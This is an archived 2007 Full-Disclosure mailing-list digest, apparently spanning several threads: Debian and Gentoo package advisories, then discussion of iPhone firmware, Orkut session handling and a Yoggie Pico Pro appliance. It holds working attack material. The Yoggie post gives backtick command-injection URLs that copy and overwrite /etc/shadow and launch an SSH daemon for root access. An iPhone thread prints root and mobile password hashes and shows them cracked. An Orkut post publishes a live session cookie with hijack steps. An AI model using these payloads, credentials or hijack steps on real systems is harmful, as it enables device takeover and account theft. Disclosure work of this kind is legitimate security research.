Size/MD5 checksum: 77862 c0e83adfc8826c0a944cd96786e96b5b mipsel architecture (MIPS (Little Endian)) http://security.debian.org/pool/updates/main/f/fireflier/fireflier-server_1.1.6-3etch1_mipsel.deb Size/MD5 checksum: 49918 8fdb8bff3171e00c81318dff7c2834bc http://security.debian.org/pool/updates/main/f/fireflier/fireflier-client-qt_1.1.6-3etch1_mipsel.deb Size/MD5 checksum: 67298 15b806ed030c3a71fce8390078739f32 http://security.debian.org/pool/updates/main/f/fireflier/fireflier-client-gtk_1.1.6-3etch1_mipsel.deb Size/MD5 checksum: 126054 51aa1ce345ea539a46ff4fc5a8353c6f http://security.debian.org/pool/updates/main/f/fireflier/fireflier-client-kde_1.1.6-3etch1_mipsel.deb Size/MD5 checksum: 67824 a5e8bcabc6192397f6701ebd62466a0c powerpc architecture (PowerPC) http://security.debian.org/pool/updates/main/f/fireflier/fireflier-client-qt_1.1.6-3etch1_powerpc.deb Size/MD5 checksum: 65700 ae5de1b34ce04bdcb9f47a644b145548 http://security.debian.org/pool/updates/main/f/fireflier/fireflier-client-gtk_1.1.6-3etch1_powerpc.deb Size/MD5 checksum: 122762 3631252bcd61ca3f01d2ee0403ee8730 http://security.debian.org/pool/updates/main/f/fireflier/fireflier-client-kde_1.1.6-3etch1_powerpc.deb Size/MD5 checksum: 62716 4abac4b6596b76653ca790c226095171 http://security.debian.org/pool/updates/main/f/fireflier/fireflier-server_1.1.6-3etch1_powerpc.deb Size/MD5 checksum: 49218 e9e2fa7a61de8ad67360c5b034f83694 s390 architecture (IBM S/390) http://security.debian.org/pool/updates/main/f/fireflier/fireflier-client-gtk_1.1.6-3etch1_s390.deb Size/MD5 checksum: 109020 dbd1d3274cedec161eec4a25b0a79ece http://security.debian.org/pool/updates/main/f/fireflier/fireflier-client-kde_1.1.6-3etch1_s390.deb Size/MD5 checksum: 59542 8a39c0ef45c9890646da6c9d5a93d3f4 http://security.debian.org/pool/updates/main/f/fireflier/fireflier-server_1.1.6-3etch1_s390.deb Size/MD5 checksum: 47148 cd7df14ccffcdec9cb8f769777d066ee http://security.debian.org/pool/updates/main/f/fireflier/fireflier-client-qt_1.1.6-3etch1_s390.deb Size/MD5 checksum: 63242 7678da0d666839e0e458c5c5c8a49e22 sparc architecture (Sun SPARC/UltraSPARC) http://security.debian.org/pool/updates/main/f/fireflier/fireflier-client-kde_1.1.6-3etch1_sparc.deb Size/MD5 checksum: 63500 303fc154d47f870590584a7cc3cb7bd2 http://security.debian.org/pool/updates/main/f/fireflier/fireflier-server_1.1.6-3etch1_sparc.deb Size/MD5 checksum: 44856 efdcc4126731ed16f10260e7900c697a http://security.debian.org/pool/updates/main/f/fireflier/fireflier-client-qt_1.1.6-3etch1_sparc.deb Size/MD5 checksum: 66338 f440f822c71d8c2ee0654390426b0207 http://security.debian.org/pool/updates/main/f/fireflier/fireflier-client-gtk_1.1.6-3etch1_sparc.deb Size/MD5 checksum: 119628 cd5422a03308735ed84a6877c9dff8c6 These files will probably be moved into the stable distribution on its next update. - --------------------------------------------------------------------------------- For apt-get: deb http://security.debian.org/ stable/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main Mailing list: debian-security-announce at lists.debian.org Package info: `apt-cache show ' and http://packages.debian.org/ -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.6 (GNU/Linux) iD8DBQFGh+kcwM/Gs81MDZ0RAg3PAJ4icO89eII8+VulxB6hLaQRyuab2wCgp1sk FMz7IO3dcqVDnD1iNJ09mFw= =JTG+ -----END PGP SIGNATURE----- From skx at debian.org Sun Jul 1 19:50:24 2007 From: skx at debian.org (Steve Kemp) Date: Sun, 1 Jul 2007 19:50:24 +0100 Subject: [Full-disclosure] [SECURITY] [DSA 1327-1] New gsambad packages fix unsafe temporary files Message-ID: <20070701185024.GA31614@steve.org.uk> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ------------------------------------------------------------------------ Debian Security Advisory DSA-1327 security at debian.org http://www.debian.org/security/ Steve Kemp July 01, 2007 - ------------------------------------------------------------------------ Package : gsambad Vulnerability : insecurity temporary files Problem type : local Debian-specific: no CVE Id(s) : CVE-2007-2838 Steve Kemp from the Debian Security Audit project discovered that gsambad, a GTK+ configuration tool for samba, uses temporary files in an unsafe manner which may be exploited to truncate arbitary files from the local system. For the stable distribution (etch) this problem has been fixed in version 0.1.4-2etch1. For the unstable distribution (sid) this problem will be fixed shortly. We recommend that you upgrade your gsambad package. Upgrade instructions - -------------------- wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 4.0 alias etch - ------------------------------- Stable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc. Source archives: http://security.debian.org/pool/updates/main/g/gsambad/gsambad_0.1.4-2etch1.diff.gz Size/MD5 checksum: 24766 8ac63c3ecf53c7243f6f8675d3e2bb48 http://security.debian.org/pool/updates/main/g/gsambad/gsambad_0.1.4-2etch1.dsc Size/MD5 checksum: 609 35dc69c7f48b6b327b782d310037eac6 http://security.debian.org/pool/updates/main/g/gsambad/gsambad_0.1.4.orig.tar.gz Size/MD5 checksum: 385776 ced255218e024b43de6d42c9fc1653d2 alpha architecture (DEC Alpha) http://security.debian.org/pool/updates/main/g/gsambad/gsambad_0.1.4-2etch1_alpha.deb Size/MD5 checksum: 109878 5aadc8c608d516df18c4bffb0cee70a9 amd64 architecture (AMD x86_64 (AMD64)) http://security.debian.org/pool/updates/main/g/gsambad/gsambad_0.1.4-2etch1_amd64.deb Size/MD5 checksum: 92416 9f332e4530c72917193402535c9f83e4 arm architecture (ARM) http://security.debian.org/pool/updates/main/g/gsambad/gsambad_0.1.4-2etch1_arm.deb Size/MD5 checksum: 88570 7f540eb27987fe1d8130279f1a3f41e1 i386 architecture (Intel ia32) http://security.debian.org/pool/updates/main/g/gsambad/gsambad_0.1.4-2etch1_i386.deb Size/MD5 checksum: 93918 4f47a220caba72b7daadf205545dd214 ia64 architecture (Intel ia64) http://security.debian.org/pool/updates/main/g/gsambad/gsambad_0.1.4-2etch1_ia64.deb Size/MD5 checksum: 120170 68f5483b3c10a787b7d8c6f3a7a39a34 mipsel architecture (MIPS (Little Endian)) http://security.debian.org/pool/updates/main/g/gsambad/gsambad_0.1.4-2etch1_mipsel.deb Size/MD5 checksum: 87426 7f4408ddd5cb502067dcea364344cfe8 powerpc architecture (PowerPC) http://security.debian.org/pool/updates/main/g/gsambad/gsambad_0.1.4-2etch1_powerpc.deb Size/MD5 checksum: 92822 4995be1a528256e86bb254dee1b0cc0f s390 architecture (IBM S/390) http://security.debian.org/pool/updates/main/g/gsambad/gsambad_0.1.4-2etch1_s390.deb Size/MD5 checksum: 85148 8ad37130b346472026e0171d09036729 sparc architecture (Sun SPARC/UltraSPARC) http://security.debian.org/pool/updates/main/g/gsambad/gsambad_0.1.4-2etch1_sparc.deb Size/MD5 checksum: 87174 b4a354e57e38c7dcaad14bff8a183975 These files will probably be moved into the stable distribution on its next update. - --------------------------------------------------------------------------------- For apt-get: deb http://security.debian.org/ stable/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main Mailing list: debian-security-announce at lists.debian.org Package info: `apt-cache show ' and http://packages.debian.org/ -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.6 (GNU/Linux) iD8DBQFGh/dAwM/Gs81MDZ0RAmahAKDiHd4jeEEP7/2szSHWbjEe0XWKzQCfZq9F J2BGQIUY5fRnFXthRMTUQv8= =i6Ld -----END PGP SIGNATURE----- From skx at debian.org Sun Jul 1 20:12:18 2007 From: skx at debian.org (Steve Kemp) Date: Sun, 1 Jul 2007 20:12:18 +0100 Subject: [Full-disclosure] [SECURITY] [DSA 1328-1] New unicon-imc2 packages fix buffer overflow Message-ID: <20070701191218.GA32613@steve.org.uk> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ------------------------------------------------------------------------ Debian Security Advisory DSA-1328 security at debian.org http://www.debian.org/security/ Steve Kemp July 01, 2007 - ------------------------------------------------------------------------ Package : unicon-imc2 Vulnerability : buffer overflow Problem type : local Debian-specific: no CVE Id(s) : CVE-2007-2835 Steve Kemp from the Debian Security Audit project discovered that unicon-imc2, a Chinese input method library, makes unsafe use of an environmental variable, which may be exploited to execute arbitary code. For the stable distribution (etch) this problem has been fixed in version 3.0.4-11etch1. For the unstable distribution (sid) this problem will be fixed shortly. We recommend that you upgrade your unicon-imc2 package. Upgrade instructions - -------------------- wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 4.0 alias etch - ------------------------------- Stable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc. Source archives: http://security.debian.org/pool/updates/main/u/unicon/unicon_3.0.4-11etch1.diff.gz Size/MD5 checksum: 14966 c3a081d69f9f81055de331690bf85e70 http://security.debian.org/pool/updates/main/u/unicon/unicon_3.0.4.orig.tar.gz Size/MD5 checksum: 5704272 dfb8650debe038f85270b4ad60ad313b http://security.debian.org/pool/updates/main/u/unicon/unicon_3.0.4-11etch1.dsc Size/MD5 checksum: 603 711b8ba2894e03f257f7d6a74f526563 alpha architecture (DEC Alpha) http://security.debian.org/pool/updates/main/u/unicon/unicon-imc2_3.0.4-11etch1_alpha.deb Size/MD5 checksum: 4376642 8cfd1066d51dc11862115179be4ce4e4 amd64 architecture (AMD x86_64 (AMD64)) http://security.debian.org/pool/updates/main/u/unicon/unicon-imc2_3.0.4-11etch1_amd64.deb Size/MD5 checksum: 4362080 bad015c61850c9a4fe5d85edc77073fd arm architecture (ARM) http://security.debian.org/pool/updates/main/u/unicon/unicon-imc2_3.0.4-11etch1_arm.deb Size/MD5 checksum: 4152566 0d8b6a4a3bab316d49eea2211affea61 hppa architecture (HP PA RISC) http://security.debian.org/pool/updates/main/u/unicon/unicon-imc2_3.0.4-11etch1_hppa.deb Size/MD5 checksum: 4546634 dbdc37a0fb794ac2d806a1c960ff7c43 i386 architecture (Intel ia32) http://security.debian.org/pool/updates/main/u/unicon/unicon-imc2_3.0.4-11etch1_i386.deb Size/MD5 checksum: 4153202 24ddede20e4b9ad3b15694275ad9d597 ia64 architecture (Intel ia64) http://security.debian.org/pool/updates/main/u/unicon/unicon-imc2_3.0.4-11etch1_ia64.deb Size/MD5 checksum: 4387184 c9494e9f38687b4cafb6b291942ddf6a mipsel architecture (MIPS (Little Endian)) http://security.debian.org/pool/updates/main/u/unicon/unicon-imc2_3.0.4-11etch1_mipsel.deb Size/MD5 checksum: 4159956 05c58cfe2805a3cd5a20171943e241c4 powerpc architecture (PowerPC) http://security.debian.org/pool/updates/main/u/unicon/unicon-imc2_3.0.4-11etch1_powerpc.deb Size/MD5 checksum: 4516520 cb01b1bbc9bf724b7c6e97231945a964 s390 architecture (IBM S/390) http://security.debian.org/pool/updates/main/u/unicon/unicon-imc2_3.0.4-11etch1_s390.deb Size/MD5 checksum: 4544838 7c2e4aa746330e0d94417a7254f03714 sparc architecture (Sun SPARC/UltraSPARC) http://security.debian.org/pool/updates/main/u/unicon/unicon-imc2_3.0.4-11etch1_sparc.deb Size/MD5 checksum: 4501702 246893314e59799c4cabc3353fa8998f These files will probably be moved into the stable distribution on its next update. - --------------------------------------------------------------------------------- For apt-get: deb http://security.debian.org/ stable/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main Mailing list: debian-security-announce at lists.debian.org Package info: `apt-cache show ' and http://packages.debian.org/ -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.6 (GNU/Linux) iD8DBQFGh/x0wM/Gs81MDZ0RAhBEAKCTnKdYgVekvJvX8B9cz2r++tdoowCgsjNn x0APOWgiDchUvmcOce+s4Hc= =6JOd -----END PGP SIGNATURE----- From falco at gentoo.org Sun Jul 1 22:41:31 2007 From: falco at gentoo.org (Raphael Marichez) Date: Sun, 1 Jul 2007 23:41:31 +0200 Subject: [Full-disclosure] [ GLSA 200707-01 ] Firebird: Buffer overflow Message-ID: <20070701214131.GB5598@falco.falcal.net> - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200707-01 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: High Title: Firebird: Buffer overflow Date: July 01, 2007 Bugs: #181811 ID: 200707-01 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== A vulnerability has been discovered in Firebird, allowing for the execution of arbitrary code. Background ========== Firebird is an open source relational database that runs on Linux, Windows, and various UNIX systems. Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 dev-db/firebird < 2.0.1 >= 2.0.1 Description =========== Cody Pierce from TippingPoint DVLabs has discovered a buffer overflow when processing "connect" requests with an overly large "p_cnct_count" value. Impact ====== An unauthenticated remote attacker could send a specially crafted request to a vulnerable server, possibly resulting in the execution of arbitrary code with the privileges of the user running Firebird. Workaround ========== There is no known workaround at this time. Resolution ========== All Firebird users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=dev-db/firebird-2.0.1" References ========== [ 1 ] CVE-2007-3181 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3181 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200707-01.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to security at gentoo.org or alternatively, you may file a bug at http://bugs.gentoo.org. License ======= Copyright 2007 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 481 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20070701/ba144218/attachment.bin From lists at infosecurity.ch Sun Jul 1 23:07:54 2007 From: lists at infosecurity.ch (Fabio Pietrosanti (naif)) Date: Mon, 02 Jul 2007 00:07:54 +0200 Subject: [Full-disclosure] iPhone Security Settings In-Reply-To: References: <44AD1215-E473-4148-A95F-CA6ED12572AE@gmail.com> Message-ID: <468825BA.1050500@infosecurity.ch> The file is a zip file. It's interesting to note the encrypted DMG image "694-5262-39.dmg" of 82MB . It ask for a password. Instead the 15MB file "694-5259-38.dmg" it's not a DMG image and it's not encrypted (strings 694-5259-38.dmg | less) . Some selected information to have an idea of what's inside: DWD_USIF_BOOTLOADER_FILENAME/Secure_USIF_Bootloader.3.9.fls MN_SMS_CB_MESSAGE_ID_LIMIT_IND sio#wake-ind SI_PHONE_NUMBER_READ_IND ../../ms-gprs-l1-src/text/l1d_rshd.c ../../ms-ds-src/at/atc/common/text/atc_sdl_mn.c SIMULATED RESET due to AT+CFUN=16. This is NOT a crash! ../../ms-bt-src/src/bt-ctrl/io_bt.c ../../ms-gprs-l2-src/ma/mac/text/decoders/mac_decoders.c ../../ms-gprs-l2-src/rl/rlc/text/rlc_op2.c ../../ms-l3-src/rr/grr/text/grr_op2.c 1 ==> output of EQUALIZER RAW DATA acc. to using a Argument Types: [int: 1/2/3/4/5],[int:0/1/2/3],[int => abs. Hz value],[int: 1 - 100] GSM Ciphering:%s, GSM Ciphering Algorithm: A5/%d, GPRS Ciphering:%s, GPRS Ciphering Algorithm: GEA/%d /SourceCache/BaseBandFWUpdater/BaseBandFWUpdater-39/IfxSource/DLL_source/OS_dependent_code/timer_if/../../../../IFWD_timer.c /SourceCache/BaseBandFWUpdater/BaseBandFWUpdater-39/AtInterface.cpp /System/Library/PrivateFrameworks/Bom.framework/Bom /SourceCache/Bom/Bom-122.0.0.3/Common/BOMSystemCmds.c /dev/tty.baseband /private/tmp/.SafeBoot /bin/cat /System/Library/CoreServices/BootX | /usr/bin/openssl dgst -sha1 -hex -out /System/Library/Caches/com.apple.bootxsignature Boot-loader is active Skip secure loader Injecting EBL-Loader (PSI). DWD_RAM_BOOTLOADER_FILENAME/Default_RAM_Bootloader.7.0.fls GsmRadioModule::fEnableMobileAnalyzer Signature cannot be authenticated single user shell terminated. Singleuser boot -- fsck not done sq->capacity >= (((((4096 + 7) / 8) + (sizeof(giantDigit)) - 1) / (sizeof(giantDigit))) + 1) /System/Library/Lockdown/SBOOT_S5L8900.pem /System/Library/Lockdown/SBOOT_S5L8900_DEV.pem There are a couple of user with their password: root:XUU7aqfpey51o:0:0::0:0:System Administrator:/var/root:/bin/sh mobile:/smx7MYTQIi2M:501:0::0:0:Mobile User:/var/mobile:/bin/sh Does someone have some time to arrange a quick john session (should be quick)? In Firmware/all_flash/all_flash.m68ap.production/DeviceTree.m68ap.img2 there is the string: Apple Secure Boot Certification Authority1 * The password of the encrypted DMG? * The user root and mobile with preconfigured passwords? * The "GsmRadioModule::fEnableMobileAnalyzer" ? * The /SourceCache/BaseBandFWUpdater/BaseBandFWUpdater-39/AtInterface.cpp that maybe use at command to update the firmware of the GSM transceiver? * What's bom? /System/Library/PrivateFrameworks/Bom.framework/Bom * The security of the boot system plenty of digital signatures to prevent firmware hacking? -naif Kevin Finisterre (lists) wrote: > While you are at it... > > http://appldnld.apple.com.edgesuite.net/content.info.apple.com/iPhone/ > 061-3538.20070629.B7vXa/iPhone1,1_1.0_1A543a_Restore.ipsw > > -KF > > On Jun 29, 2007, at 8:10 PM, John Smith wrote: > > >> http://www.andrew.cmu.edu/user/xsk/iPhoneSecuritySettings.html >> >> John >> >> _______________________________________________ >> Full-Disclosure - We believe in it. >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >> Hosted and sponsored by Secunia - http://secunia.com/ >> > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > From e_tews at cdc.informatik.tu-darmstadt.de Sun Jul 1 23:20:37 2007 From: e_tews at cdc.informatik.tu-darmstadt.de (Erik Tews) Date: Mon, 02 Jul 2007 00:20:37 +0200 Subject: [Full-disclosure] iPhone Security Settings In-Reply-To: <468825BA.1050500@infosecurity.ch> References: <44AD1215-E473-4148-A95F-CA6ED12572AE@gmail.com> <468825BA.1050500@infosecurity.ch> Message-ID: <1183328437.4868.0.camel@localhost.localdomain> Am Montag, den 02.07.2007, 00:07 +0200 schrieb Fabio Pietrosanti (naif): > There are a couple of user with their password: > > root:XUU7aqfpey51o:0:0::0:0:System Administrator:/var/root:/bin/sh > mobile:/smx7MYTQIi2M:501:0::0:0:Mobile User:/var/mobile:/bin/sh > > Does someone have some time to arrange a quick john session (should be > quick)? Loaded 2 passwords with 2 different salts (Standard DES [64/64 BS]) alpine (mobile) dottie (root) guesses: 2 time: 0:00:00:16 (3) c/s: 551883 trying: royour - b1o2w8 Yes, it was quick -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 189 bytes Desc: Dies ist ein digital signierter Nachrichtenteil Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20070702/0c59e8af/attachment.bin From steve at uptime.org.uk Sun Jul 1 23:32:00 2007 From: steve at uptime.org.uk (Stephen Hildrey) Date: Sun, 01 Jul 2007 23:32:00 +0100 Subject: [Full-disclosure] iPhone Security Settings In-Reply-To: <468825BA.1050500@infosecurity.ch> References: <44AD1215-E473-4148-A95F-CA6ED12572AE@gmail.com> <468825BA.1050500@infosecurity.ch> Message-ID: <46882B60.2010900@uptime.org.uk> Fabio Pietrosanti (naif) wrote: > root:XUU7aqfpey51o:0:0::0:0:System Administrator:/var/root:/bin/sh > mobile:/smx7MYTQIi2M:501:0::0:0:Mobile User:/var/mobile:/bin/sh Nice find. Even my AMD 4200+ can cope with that... $ john pw Loaded 2 passwords with 2 different salts (Standard DES [64/64 BS]) alpine (mobile) dottie (root) Steve From leet16y at yahoo.com Mon Jul 2 10:01:45 2007 From: leet16y at yahoo.com (Joseph Hick) Date: Mon, 2 Jul 2007 02:01:45 -0700 (PDT) Subject: [Full-disclosure] New flaw found in Firefox 2.0.0.4: Firefox file input focus vulnerabilities In-Reply-To: <468665EA.60002@hrnz.net> Message-ID: <166868.5267.qm@web38007.mail.mud.yahoo.com> Oh! I was wrong. I didn't see file1's value is assigned to text1's value. certainly, it is a flaw as nicely explained by Zalewski. I wrote a PoC myself and found that it's not necessary to put focus on the label. focussing the file input also works. I succeeded in writing the same PoC without label with minor modifications. --- Martin Thurau wrote: > i had exactly the same thoughts. the only thing to > wonder is, why > firefox process the actual input after it did the > "onkeydown". but this > is only "weird" and not a "flaw". > > > Joseph Hick wrote: > > i didn't understand your poc. > > > > you are copying the value of textarea into the > file > > input yourself using this code. > > > > > document.getElementById("text1").value=document.getElementById("file1").value; > > document.getElementById("text1").focus(); > > > > so how is it a flaw? > > > > > > --- carl hardwick wrote: > > > >> New flaw found in Firefox 2.0.0.4: Firefox file > >> input focus vulnerabilities: > >> [...] > >> PoC here: > >> > http://yathong.googlepages.com/FirefoxFocusBug.html > >> > >> credits by - Hong > >> ____________________________________________________________________________________ No need to miss a message. Get email on-the-go with Yahoo! Mail for Mobile. Get started. http://mobile.yahoo.com/mail From lcamtuf at dione.ids.pl Mon Jul 2 10:15:06 2007 From: lcamtuf at dione.ids.pl (Michal Zalewski) Date: Mon, 2 Jul 2007 11:15:06 +0200 (CEST) Subject: [Full-disclosure] New flaw found in Firefox 2.0.0.4: Firefox file input focus vulnerabilities In-Reply-To: <166868.5267.qm@web38007.mail.mud.yahoo.com> References: <166868.5267.qm@web38007.mail.mud.yahoo.com> Message-ID: On Mon, 2 Jul 2007, Joseph Hick wrote: > I succeeded in writing the same PoC without label with minor > modifications. Would that allow you to selectively redirect keystrokes (that is, check event's keycode)? More importantly, does Carl's original example allow that?:-) An example of event check logic is implemented in my original POC; if you can't redirect selectively (that is, prevent certain events from being delivered to INPUT TYPE=FILE field), the flaw is much less severe. (Would check that, but am at work). /mz From leet16y at yahoo.com Mon Jul 2 10:41:01 2007 From: leet16y at yahoo.com (Joseph Hick) Date: Mon, 2 Jul 2007 02:41:01 -0700 (PDT) Subject: [Full-disclosure] Google/Orkut Authentication Issue PoC In-Reply-To: <104580.93132.qm@web38011.mail.mud.yahoo.com> Message-ID: <562020.96926.qm@web38014.mail.mud.yahoo.com> It has been more than 36 hours and we have logged out of the account at least 10 times. The POC still works and my account can still be hijacked. This proves the Net-Square report - "Google has fixed this problem on their side. session cookies are now set to expire within 24 hours from the server side, as opposed to two weeks." - to be wrong. Moreover expiry within 24 hours is not a fix. expiry of session in 24 hours + expiry of session on logout + disabling the session on lockout is a fix. --- Joseph Hick wrote: > This is a proof of concept for Google Authentication > issues posted in the threads... > > 1.) > http://lists.grok.org.uk/pipermail/full-disclosure/2007-June/064143.html > (Orkut Server Side Management Error by Susam Pal & > Vipul Agarwal) > > 2.) > http://lists.grok.org.uk/pipermail/full-disclosure/2007-June/064300.html > (Google Re-authentication Bypass by Susam Pal) > > I found that after logging out Google session > doesn't > expire in 24 hours. It is longer. I am doing this > experiment to see how long the session remains alive > after logging out. > > I am posting a session cookie for my account. > > Name: orkut_state > Cookie: > ORKUTPREF=ID=11190574376736842125:INF=0:SET=111236436:LNG=1:CNT=0:RM=0:USR=aGlqYWNrbWVwbGVhc2VAZ29vZ2xlbWFpbC5jb20=:PHS=:TS=1183210062:LCL=en-US:NET=1:TOS=1:GC=DQAAAIMAAAArC-mJYqsrCOnv8uVQHdFUccRFQX8-ibRerEzrie5sOWNc06zs4z4fMNpovLUyRcNXHwxk8WzY6Z6SmvxcSmL1hAW4Mrdvazzkssq5VjSO70oE1HSFR4KOkSb3ZLg-U7k0x8c7ZuLHwu_qY2Umy8oobckg9UctWXYd1qoerXUTzsFSuLNXHdiAEVCSw7fUO00:PE=aGlqYWNrbWVwbGVhc2VAZ29vZ2xlbWFpbC5jb20=:GTI=0:GID=aGlqYWNrbWVwbGVhc2VAZ29vZ2xlbWFpbC5jb20=:VER=2:S=1Ah7VcA0JetHQ0Mgyfp4Jb6meXw=: > Domain: .www.orkut.com > Path: / > Send for: Any type of session > Expires: Expire at end of session > > I have logged out but you can use this cookie in > this > way... (anyone can try this. You don't need Orkut > account to try this) > > 1.) Open Firefox, etc. which allows cookie editing. > This extension is required... > https://addons.mozilla.org/en-US/firefox/addon/573 > > 2.) Set the given cookie. > > 3.) Try to visit http://www.orkut.com/Home.aspx > > 4.) You will be automatically logged in with my > account. It will not ask for any user-name or > password. > > 5.) Logout > > 6.) Repeat steps 1. to 4. You can log in again. > > I want to see how long this session remains alive > after multiple logout. If you try this POC leave a > message in the scrapbook of the account here ... > http://www.orkut.com/Scrapbook.aspx > > Thanks > Joseph > ____________________________________________________________________________________ Building a website is a piece of cake. Yahoo! Small Business gives you all the tools to get online. http://smallbusiness.yahoo.com/webhosting From cody.brocious at gmail.com Mon Jul 2 12:00:31 2007 From: cody.brocious at gmail.com (Cody Brocious) Date: Mon, 2 Jul 2007 07:00:31 -0400 Subject: [Full-disclosure] Yoggie Pico Pro Remote Code Execution Message-ID: <4987c3660707020400h7294e8c4q9c3b8ca2b8aa3615@mail.gmail.com> This vulnerability affects the Yoggie Pico Pro (and most certainly the Yoggie Pico, due to them being effectively identical) security appliance. They expose a 'ping' function in their web interface for diagnostic purposes, which passes the IP/hostname given directly to ping in the form of 'ping -c 10 '. They do basic checking for ampersands, semicolons, and pipes, but do not check for backticks, which allows you to execute commands as root on the device. Proof of concept: When run from a machine with a Yoggie Pico Pro connected, yoggie.yoggie.com resolves to the IP of the device, so these links will of course not work unless you have a device connected. I didn't brute-force the root password, so I explain how you can replace their /etc/shadow to set the password to whatever you choose. To access the original /etc/shadow: https://yoggie.yoggie.com:8443/cgi-bin/runDiagnostics.cgi?command=Ping¶m=%60cp%20/etc/shadow%20shadow.txt%60 https://yoggie.yoggie.com:8443/cgi-bin/shadow.txt Replace the root password with the password of your choosing, then wrap the file in single quotes and urlencode the entire string. To replace the original /etc/shadow with your own: https://yoggie.yoggie.com:8443/cgi-bin/runDiagnostics.cgi?command=Ping¶m=%60echo%20%20%3E%20/etc/shadow%60 Finally, running dropbear sshd on port 7290 (random choice -- not blocked by their firewall rules) https://yoggie.yoggie.com:8443/cgi-bin/runDiagnostics.cgi?command=Ping¶m=%60/usr/sbin/dropbear%20-p%207290%60 Log in as root with the password chosen, and you now have complete control over the device. It's quite powerful little computer, and a whole hell of a lot of fun to play around with. A word of advice, though -- don't touch libc in any way, shape, or form, as there's no reflash mechanism I've found on the device, which is why I now have a bricked pico pro sitting on my desk ;) - Cody Brocious From gautam.bipin at gmail.com Mon Jul 2 15:43:40 2007 From: gautam.bipin at gmail.com (Bipin Gautam) Date: Mon, 2 Jul 2007 20:28:40 +0545 Subject: [Full-disclosure] Rutkowska faces '100% undetectable malware' challenge, teasing? In-Reply-To: References: <8e5ffb560706300822w60393946v4fc1585aff84752e@mail.gmail.com> Message-ID: <8e5ffb560707020743u4cacb68crfbca18afa54cdc0e@mail.gmail.com> On 7/1/07, Peter Ferrie wrote: > The problem is that she wants the money upfront, in order to develop the 100% undetectable thing that she doesn't have right now. So that's a problem. > > Peter thanks for the paper... http://www.symantec.com/avcenter/reference/Virtual_Machine_Threats.pdf :) From kf_lists at digitalmunition.com Mon Jul 2 16:12:55 2007 From: kf_lists at digitalmunition.com (Kevin Finisterre (lists)) Date: Mon, 2 Jul 2007 11:12:55 -0400 Subject: [Full-disclosure] iPhone Security Settings In-Reply-To: <46882B60.2010900@uptime.org.uk> References: <44AD1215-E473-4148-A95F-CA6ED12572AE@gmail.com> <468825BA.1050500@infosecurity.ch> <46882B60.2010900@uptime.org.uk> Message-ID: If anyone winds up with crash dumps from when Tunes syncs with the iPhone I wouldn't mind having a few of them. They should be located in /Library/Logs/CrashReporter/MobileDevice/ Weeeeee everything runs with Effective UID: 0 -KF On Jul 1, 2007, at 6:32 PM, Stephen Hildrey wrote: > Fabio Pietrosanti (naif) wrote: >> root:XUU7aqfpey51o:0:0::0:0:System Administrator:/var/root:/bin/sh >> mobile:/smx7MYTQIi2M:501:0::0:0:Mobile User:/var/mobile:/bin/sh > > Nice find. Even my AMD 4200+ can cope with that... > > $ john pw > Loaded 2 passwords with 2 different salts (Standard DES [64/64 BS]) > alpine (mobile) > dottie (root) > > Steve > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20070702/72e28a15/attachment.html From mwollenweber at gmail.com Sun Jul 1 02:28:06 2007 From: mwollenweber at gmail.com (matthew wollenweber) Date: Sat, 30 Jun 2007 21:28:06 -0400 Subject: [Full-disclosure] [Dailydave] iPhone Roadblock Message-ID: <42210a440706301828u10a5d8eer688a381b96f604f5@mail.gmail.com> I'm one of the lucky (or possibly crazy) people that managed to get an iPhone yesterday. If you're curious, I'm very happy with it so far. I'm not an Apple nut that buys all things Apple, but after years of "smartphones" that never seemed quite right, the iPhone really seems to have hit the mark. My biggest worry was that it used Edge rather than 3G. While at some points this is noticeable, the caching and windowing mechanisms really make up for the difference. On the whole it's the best smartphone experience I've had. But you can read all the reviews in a more appropriate forum... I'm really interested in hacking up my iPhone. Anything 